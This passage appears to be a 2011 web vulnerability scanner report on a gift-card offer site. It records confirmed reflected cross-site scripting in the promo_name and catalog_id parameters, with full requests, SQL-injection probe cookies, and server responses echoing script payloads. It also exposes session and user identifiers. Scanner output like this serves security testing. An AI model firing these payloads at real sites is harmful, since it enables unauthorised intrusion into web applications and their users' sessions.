</td></tr></table>
</div>






<div id="hdbot">
<div id="stepArea3"><span class="fillout">Congratulations</span></div>
</div>
</div>

<div class="spacer45">&nbsp;</div>
<div class="spacer45">&nbsp;</div>
<div class="spacer45">&nbsp;</div>
<div id="guest-cardarea">


<table width="790" border="0" cellpadding="8" cellspacing="8">
<tr>
<td width="250">

<span class="gifttitle">$250 in McDonald's&reg; Arch Cards&trade;</span> <br />
<span style="margin-left: 30px;"><img src="http://i.pcp001.com/g/archcard1_165x150.gif" alt=""></span></td>
<td width="370" valign="top">
<div class="spacer15">&nbsp;</div>
<div class="spacer15">&nbsp;</div>
<img src="http://i.pcp001.com/t/9794/shiptitle-box.jpg" width="174" height="29" />
<div style="margin-left: 30px;">
<p></p>
<span class="font11">You will have a chance to confirm<br />
your address prior to shipping.</span>
</div>
</td>

<td width="150" valign="top"><br />
<span class="font11">
Congratulations, ! To qualify for your free $250 in McDonald's&reg; Arch Cards&trade;, start by completing any 2 of the Silver offers listed below!</span>





</td>
</tr>
</table>

</div>
</div>

<!-- Content Begins -->
<div id="content">
<table width="95%" border="0" cellspacing="0" cellpadding="5" align="center">


</table>
<div>


<table border="0" cellpadding="0" cellspacing="0" width="100%">
<tr>
<td align="left" width="40%" valign="top">
<div id="blue_previousbutton1">
<span id="ic_link_previous_1">
<a href="/ups.htm?path=p.prize.prepop&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x0001C9)</script>&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path=3" onClick="hp_cmd=0;x_cmd=0;" ><img src="http://i.pcp001.com/t/7356/pix.gif" style="width: 134px; height: 75px;" border="0"></a>
</span>
</div>
</td>
<td align="right" valign="top">
<table width="100%" border="0"><tr><td width=360 NOWRAP><span class="buttontxt" id="buttontxt1" >After You've Completed 2 Offers</span></td><td>
<div id="blue_nextbutton1">
<a href="/ups.htm?path=p.prize.prepop-reg-ic_3group_group1&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x0001C9)</script>&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path=3" onClick="hp_cmd=0;x_cmd=0;" ><img src="http://i.pcp001.com/t/7356/pix.gif" border="0" style="width: 207px; height: 88px;"></a>
</div>
</td>
</tr>
</table>




</td>
</tr>
</table>



</div>
<br><br>
<br><br>


<!-- DISCLAIMER START -->
<div id="disclaimer_container">
<p>
<!--BeginField:Disclaimer-->
You are required to complete at least 2 Silver, 2 Gold and 2 Platinum Sponsor Offer(s) above and must satisfy all <a href="info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265#prog_req" TARGET="_blank" onClick="window.open('info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617#prog_req','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Program Requirements</a> to qualify for your gift including: not cancelling your participation in more than a total of 2 Sponsor Offers within 30 days of the Sponsor Offer Initial Transaction Date (the Cancellation Limitation). Promotion <a href="info.htm?tp=tos&promo_name=2192name&gift=29617&catalog_id=13200&SID=f05c7ce946bc38d8bfa6b839a4d56265#prog_req" TARGET="_blank" onClick="window.open('info.htm?tp=tos&promo_name=2192name&gift=29617&catalog_id=13200#prog_req','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Terms and Conditions</a> prevail over Sponsor Offer terms and conditions. Limit one gift per household per year.
<br/><br/>
For credit card offers, you must activate your card by making a purchase, transferring a balance, or making cash advance; for satellite tv offers you must have the product installed.
<br/><br/>
We are not endorsed, sponsored by or affiliated with above trademarks, or any other merchants listed above. Such terms are registered trademarks of their respective owners.
<!--EndField:Disclaimer-->
</p>
<p align="center">
<!--BeginField:Links--><A HREF="/redeem.htm?promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/redeem.htm?promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Gift Redemption</A> - <A HREF="/info.htm?tp=faq&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=faq&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">FAQ</a> - <A HREF="/info.htm?tp=privacy&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=privacy&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes ,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=450');return false;make_x_win=0;">Privacy Policy</A> - <A HREF="/info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Terms &amp; Conditions</A> - <A HREF="/suppress.htm?user_ref_id=90563525&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/suppress.htm?user_ref_id=90563525&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Unsubscribe</A> - <A HREF="/info.htm?tp=con&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=con&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Contact Us</A><!--EndField:Links-->
</p>
<p align="center">
<!--BeginField:Copyright-->
Copyright &copy; 2009 Your-gift-zone. All rights reserved.
<!--EndField:Copyright-->
</p>
</div>
<!-- DISCLAIMER END -->





</div>
<!-- Content ENDS -->



</BODY>
</html>



- /ups.htm

/ups.htm CONFIRMED

http://your-gift-zone.com/ups.htm?path=p.prize.prepop-reg&user_pin_id=200492244&pin_key=706853&user_..

Parameters

Parameter Type Value
path GET p.prize.prepop-reg
user_pin_id GET 200492244
pin_key GET 706853
user_ref_id GET 90563525
gift GET 29617
user_gift_id GET 332549389
promotion_id GET 2192
promo_name GET '"--></style></script><script>alert(0x0001CA)</script>
catalog_id GET 13200
ups_ref GET cg
remoteRef GET 3_4_0_5068_0
sendroikwd GET 3
return_url GET 3
tmp_sequence GET 6924-11079-6839-10131-6166-10237-10231-10284-10233-10292
page_list GET li_sr_sm
short_ic_path GET 3
SID GET f05c7ce946bc38d8bfa6b839a4d56265

Request

GET /ups.htm?path=p.prize.prepop-reg&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001CA)%3C/script%3E&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path=3&SID=f05c7ce946bc38d8bfa6b839a4d56265 HTTP/1.1
Referer: http://your-gift-zone.com/ups.htm?user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&path=p.prize.prepop-reg-int&page_tmp_id=9&promotion_id=2192&promo_name=2192name&catalog_id=13200&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_tmp=&ups_ref=cg&sendroikwd=&raf_ad_id=&remoteRef=3_4_0_5068_0&return_url=&short_ic_path=&SID=f05c7ce946bc38d8bfa6b839a4d56265&page_list=li_sr_sm
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: your-gift-zone.com
Cookie: CHAR(109)=; CHAR(97))=; 0x3a=; CHAR(97)))=; TlM3NzU0NTYxNDQ2NTc1=; 2))--=; 1=; 1))=; 0)>255)=; 0)=1; JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMTM2KTwvc2NyaXB0Pg==; 0)>0--=; 0)<255--=; 0)>255--=; 0)>25--=; 0)>0=; 0)<255=; 0)>255=; 0)>25=; JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMUFGKTwvc2NyaXB0Pg==
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Wed, 27 Apr 2011 15:06:07 GMT
Server: Apache
X-Powered-By: PHP/5.0.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Set-Cookie: track_cookie=4db830e00885e8an;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.theuseful.com;,promo_name_cookie='"--></style></script><script>netsparker(0x0001CA)</script>;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;,c_user_pin_id=200492244;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;,c_pin_key=706853;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;,c_email_key=063756462f49f8c46ec5bc4e60bb02b1;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;
P3P: CP='CAO DSP COR CURa OUR IND ONL UNI NAV INT CNT STA PRE' policyref='http://www.theuseful.com/w3c/p3p.xml'
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Your-gift-zone</title>
<link rel="stylesheet" href="http://i.pcp001.com/t/9533/regpath3_03.css" type="text/css" media="all">
<link rel="stylesheet" href="http://i.pcp001.com/t/9673/red4.css" type="text/css" media="all">
<style>

#ic_link_previous_1 {
display:none
}
.justcenter_1{
text-align: center;
}

.justcenter_2{
float: right;
}

.justcenter_3{
float: right;
}




div.spacer{
height:40px;
*height:60px;
font-size:40px;
*font-size:60px;
}



#details {
display:none;
position:absolute;
background-color:#FFF;
width:300px;
z-index:2;
padding:5px 10px 10px 10px;
border:1px solid #000;
font-size:12px;
color:#000000;
text-align:left;
font-family: Arial, Helvetica, sans-serif;
font-weight:normal;
text-decoration:none;
}

#details a {
color:#0000FF;
}
</style>

<script language="javascript">
function showD(id) {
document.getElementById(id).style.display = "block";
}
function hideD(id) {
document.getElementById(id).style.display = "none";
}
</script>

<SCRIPT>
var x_cmd=1;

function x_win(){
if(x_cmd==1){
x_win=window.open('/ups.htm?path=p.prize.prepop-reg&mode=exit&exit_num=&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name='"--></style></script><script>netsparker(0x0001CA)</script>&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&SID=f05c7ce946bc38d8bfa6b839a4d56265','_blank','top=0,left=0,screenX=0,screenY=0,scrollbars,width=550,height=500');x_win.focus();
}
}

function changeFontSize()
{
return;
var text = document.getElementById("phrase").innerHTML;
var fontSize = -1.75 * (parseInt(text.length)) + 90;
document.getElementById("phrase").style.fontSize = fontSize + 'px';
return;
}


</SCRIPT>
</head>

<BODY onLoad="changeFontSize();" onUnLoad="x_win();" >
<div id="hdrContentOffers">
<div id="header">
<div id="hdtop">
<table width="750" height="100%"><tr><td class="mainHdr">
Receive Your FREE $250 in McDonald's&reg; Arch Cards&trade;.
</td></tr></table>
</div>






<div id="hdbot">
<div id="stepArea3"><span class="fillout">Congratulations</span></div>
</div>
</div>

<div class="spacer45">&nbsp;</div>
<div class="spacer45">&nbsp;</div>
<div class="spacer45">&nbsp;</div>
<div id="guest-cardarea">


<table width="790" border="0" cellpadding="8" cellspacing="8">
<tr>
<td width="250">

<span class="gifttitle">$250 in McDonald's&reg; Arch Cards&trade;</span> <br />
<span style="margin-left: 30px;"><img src="http://i.pcp001.com/g/archcard1_165x150.gif" alt=""></span></td>
<td width="370" valign="top">
<div class="spacer15">&nbsp;</div>
<div class="spacer15">&nbsp;</div>
<img src="http://i.pcp001.com/t/9794/shiptitle-box.jpg" width="174" height="29" />
<div style="margin-left: 30px;">
<p></p>
<span class="font11">You will have a chance to confirm<br />
your address prior to shipping.</span>
</div>
</td>

<td width="150" valign="top"><br />
<span class="font11">
Congratulations, ! To qualify for your free $250 in McDonald's&reg; Arch Cards&trade;, start by completing any 2 of the Silver offers listed below!</span>





</td>
</tr>
</table>

</div>
</div>

<!-- Content Begins -->
<div id="content">
<table width="95%" border="0" cellspacing="0" cellpadding="5" align="center">


</table>
<div>


<table border="0" cellpadding="0" cellspacing="0" width="100%">
<tr>
<td align="left" width="40%" valign="top">
<div id="blue_previousbutton1">
<span id="ic_link_previous_1">
<a href="/ups.htm?path=p.prize.prepop&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x0001CA)</script>&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path=3" onClick="hp_cmd=0;x_cmd=0;" ><img src="http://i.pcp001.com/t/7356/pix.gif" style="width: 134px; height: 75px;" border="0"></a>
</span>
</div>
</td>
<td align="right" valign="top">
<table width="100%" border="0"><tr><td width=360 NOWRAP><span class="buttontxt" id="buttontxt1" >After You've Completed 2 Offers</span></td><td>
<div id="blue_nextbutton1">
<a href="/ups.htm?path=p.prize.prepop-reg-ic_3group_group1&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x0001CA)</script>&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path=3" onClick="hp_cmd=0;x_cmd=0;" ><img src="http://i.pcp001.com/t/7356/pix.gif" border="0" style="width: 207px; height: 88px;"></a>
</div>
</td>
</tr>
</table>




</td>
</tr>
</table>



</div>
<br><br>
<br><br>


<!-- DISCLAIMER START -->
<div id="disclaimer_container">
<p>
<!--BeginField:Disclaimer-->
You are required to complete at least 2 Silver, 2 Gold and 2 Platinum Sponsor Offer(s) above and must satisfy all <a href="info.htm?tp=tos&promo_name='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x0001CA)</script>&catalog_id=13200&gift=29617#prog_req" TARGET="_blank" onClick="window.open('info.htm?tp=tos&promo_name='"--></style></script><script>netsparker(0x0001CA)</script>&catalog_id=13200&gift=29617#prog_req','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Program Requirements</a> to qualify for your gift including: not cancelling your participation in more than a total of 2 Sponsor Offers within 30 days of the Sponsor Offer Initial Transaction Date (the Cancellation Limitation). Promotion <a href="info.htm?tp=tos&promo_name='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x0001CA)</script>&gift=29617&catalog_id=13200#prog_req" TARGET="_blank" onClick="window.open('info.htm?tp=tos&promo_name='"--></style></script><script>netsparker(0x0001CA)</script>&gift=29617&catalog_id=13200#prog_req','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Terms and Conditions</a> prevail over Sponsor Offer terms and conditions. Limit one gift per household per year.
<br/><br/>
For credit card offers, you must activate your card by making a purchase, transferring a balance, or making cash advance; for satellite tv offers you must have the product installed.
<br/><br/>
We are not endorsed, sponsored by or affiliated with above trademarks, or any other merchants listed above. Such terms are registered trademarks of their respective owners.
<!--EndField:Disclaimer-->
</p>
<p align="center">
<!--BeginField:Links--><A HREF="/redeem.htm?promo_name='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x0001CA)</script>&catalog_id=13200&gift=29617" TARGET="_blank" onClick="window.open('/redeem.htm?promo_name='"--></style></script><script>netsparker(0x0001CA)</script>&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Gift Redemption</A> - <A HREF="/info.htm?tp=faq&promo_name='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x0001CA)</script>&catalog_id=13200&gift=29617" TARGET="_blank" onClick="window.open('/info.htm?tp=faq&promo_name='"--></style></script><script>netsparker(0x0001CA)</script>&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">FAQ</a> - <A HREF="/info.htm?tp=privacy&promo_name='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x0001CA)</script>&catalog_id=13200&gift=29617" TARGET="_blank" onClick="window.open('/info.htm?tp=privacy&promo_name='"--></style></script><script>netsparker(0x0001CA)</script>&catalog_id=13200&gift=29617','_blank','resizable=yes ,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=450');return false;make_x_win=0;">Privacy Policy</A> - <A HREF="/info.htm?tp=tos&promo_name='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x0001CA)</script>&catalog_id=13200&gift=29617" TARGET="_blank" onClick="window.open('/info.htm?tp=tos&promo_name='"--></style></script><script>netsparker(0x0001CA)</script>&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Terms &amp; Conditions</A> - <A HREF="/suppress.htm?user_ref_id=90563525&promo_name='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x0001CA)</script>&catalog_id=13200&gift=29617" TARGET="_blank" onClick="window.open('/suppress.htm?user_ref_id=90563525&promo_name='"--></style></script><script>netsparker(0x0001CA)</script>&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Unsubscribe</A> - <A HREF="/info.htm?tp=con&promo_name='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x0001CA)</script>&catalog_id=13200&gift=29617" TARGET="_blank" onClick="window.open('/info.htm?tp=con&promo_name='"--></style></script><script>netsparker(0x0001CA)</script>&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Contact Us</A><!--EndField:Links-->
</p>
<p align="center">
<!--BeginField:Copyright-->
Copyright &copy; 2009 Your-gift-zone. All rights reserved.
<!--EndField:Copyright-->
</p>
</div>
<!-- DISCLAIMER END -->





</div>
<!-- Content ENDS -->



</BODY>
</html>



- /ups.htm

/ups.htm CONFIRMED

http://your-gift-zone.com/ups.htm?path=p.prize.prepop-reg&user_pin_id=200492244&pin_key=706853&user_..

Parameters

Parameter Type Value
path GET p.prize.prepop-reg
user_pin_id GET 200492244
pin_key GET 706853
user_ref_id GET 90563525
gift GET 29617
user_gift_id GET 332549389
promotion_id GET 2192
promo_name GET 2192name
catalog_id GET '"--></style></script><script>alert(0x0001CB)</script>
ups_ref GET cg
remoteRef GET 3_4_0_5068_0
sendroikwd GET 3
return_url GET 3
tmp_sequence GET 6924-11079-6839-10131-6166-10237-10231-10284-10233-10292
page_list GET li_sr_sm
short_ic_path GET 3
SID GET f05c7ce946bc38d8bfa6b839a4d56265

Request

GET /ups.htm?path=p.prize.prepop-reg&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001CB)%3C/script%3E&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path=3&SID=f05c7ce946bc38d8bfa6b839a4d56265 HTTP/1.1
Referer: http://your-gift-zone.com/ups.htm?user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&path=p.prize.prepop-reg-int&page_tmp_id=9&promotion_id=2192&promo_name=2192name&catalog_id=13200&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_tmp=&ups_ref=cg&sendroikwd=&raf_ad_id=&remoteRef=3_4_0_5068_0&return_url=&short_ic_path=&SID=f05c7ce946bc38d8bfa6b839a4d56265&page_list=li_sr_sm
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: your-gift-zone.com
Cookie: CHAR(109)=; CHAR(97))=; 0x3a=; CHAR(97)))=; TlM3NzU0NTYxNDQ2NTc1=; 2))--=; 1=; 1))=; 0)>255)=; 0)=1; JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMTM2KTwvc2NyaXB0Pg==; 0)>0--=; 0)<255--=; 0)>255--=; 0)>25--=; 0)>0=; 0)<255=; 0)>255=; 0)>25=; JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMUFGKTwvc2NyaXB0Pg==
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Wed, 27 Apr 2011 15:06:10 GMT
Server: Apache
X-Powered-By: PHP/5.0.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Set-Cookie: track_cookie=4db830e28532b9fe;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.theuseful.com;,promo_name_cookie=2192name;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;,c_user_pin_id=200492244;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;,c_pin_key=706853;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;,c_email_key=063756462f49f8c46ec5bc4e60bb02b1;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;
P3P: CP='CAO DSP COR CURa OUR IND ONL UNI NAV INT CNT STA PRE' policyref='http://www.theuseful.com/w3c/p3p.xml'
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Your-gift-zone</title>
<link rel="stylesheet" href="http://i.pcp001.com/t/9533/regpath3_03.css" type="text/css" media="all">
<link rel="stylesheet" href="http://i.pcp001.com/t/9673/red4.css" type="text/css" media="all">
<style>

#ic_link_previous_1 {
display:none
}
.justcenter_1{
text-align: center;
}

.justcenter_2{
float: right;
}

.justcenter_3{
float: right;
}




div.spacer{
height:40px;
*height:60px;
font-size:40px;
*font-size:60px;
}



#details {
display:none;
position:absolute;
background-color:#FFF;
width:300px;
z-index:2;
padding:5px 10px 10px 10px;
border:1px solid #000;
font-size:12px;
color:#000000;
text-align:left;
font-family: Arial, Helvetica, sans-serif;
font-weight:normal;
text-decoration:none;
}

#details a {
color:#0000FF;
}
</style>

<script language="javascript">
function showD(id) {
document.getElementById(id).style.display = "block";
}
function hideD(id) {
document.getElementById(id).style.display = "none";
}
</script>

<SCRIPT>
var x_cmd=1;

function x_win(){
if(x_cmd==1){
x_win=window.open('/ups.htm?path=p.prize.prepop-reg&mode=exit&exit_num=&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id='"--></style></script><script>netsparker(0x0001CB)</script>&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&SID=f05c7ce946bc38d8bfa6b839a4d56265','_blank','top=0,left=0,screenX=0,screenY=0,scrollbars,width=550,height=500');x_win.focus();
}
}

function changeFontSize()
{
return;
var text = document.getElementById("phrase").innerHTML;
var fontSize = -1.75 * (parseInt(text.length)) + 90;
document.getElementById("phrase").style.fontSize = fontSize + 'px';
return;
}


</SCRIPT>
</head>

<BODY onLoad="changeFontSize();" onUnLoad="x_win();" >
<div id="hdrContentOffers">
<div id="header">
<div id="hdtop">
<table width="750" height="100%"><tr><td class="mainHdr">
Receive Your FREE $250 in McDonald's&reg; Arch Cards&trade;.
</td></tr></table>
</div>






<div id="hdbot">
<div id="stepArea3"><span class="fillout">Congratulations</span></div>
</div>
</div>

<div class="spacer45">&nbsp;</div>
<div class="spacer45">&nbsp;</div>
<div class="spacer45">&nbsp;</div>
<div id="guest-cardarea">


<table width="790" border="0" cellpadding="8" cellspacing="8">
<tr>
<td width="250">

<span class="gifttitle">$250 in McDonald's&reg; Arch Cards&trade;</span> <br />
<span style="margin-left: 30px;"><img src="http://i.pcp001.com/g/archcard1_165x150.gif" alt=""></span></td>
<td width="370" valign="top">
<div class="spacer15">&nbsp;</div>
<div class="spacer15">&nbsp;</div>
<img src="http://i.pcp001.com/t/9794/shiptitle-box.jpg" width="174" height="29" />
<div style="margin-left: 30px;">
<p></p>
<span class="font11">You will have a chance to confirm<br />
your address prior to shipping.</span>
</div>
</td>

<td width="150" valign="top"><br />
<span class="font11">
Congratulations, ! To qualify for your free $250 in McDonald's&reg; Arch Cards&trade;, start by completing any 2 of the Silver offers listed below!</span>





</td>
</tr>
</table>

</div>
</div>

<!-- Content Begins -->
<div id="content">
<table width="95%" border="0" cellspacing="0" cellpadding="5" align="center">


</table>
<div>


<table border="0" cellpadding="0" cellspacing="0" width="100%">
<tr>
<td align="left" width="40%" valign="top">
<div id="blue_previousbutton1">
<span id="ic_link_previous_1">
<a href="/ups.htm?path=p.prize.prepop&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x0001CB)</script>&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path=3" onClick="hp_cmd=0;x_cmd=0;" ><img src="http://i.pcp001.com/t/7356/pix.gif" style="width: 134px; height: 75px;" border="0"></a>
</span>
</div>
</td>
<td align="right" valign="top">
<table width="100%" border="0"><tr><td width=360 NOWRAP><span class="buttontxt" id="buttontxt1" >After You've Completed 2 Offers</span></td><td>
<div id="blue_nextbutton1">
<a href="/ups.htm?path=p.prize.prepop-reg-ic_3group_group1&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x0001CB)</script>&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path=3" onClick="hp_cmd=0;x_cmd=0;" ><img src="http://i.pcp001.com/t/7356/pix.gif" border="0" style="width: 207px; height: 88px;"></a>
</div>
</td>
</tr>
</table>




</td>
</tr>
</table>



</div>
<br><br>
<br><br>


<!-- DISCLAIMER START -->
<div id="disclaimer_container">
<p>
<!--BeginField:Disclaimer-->
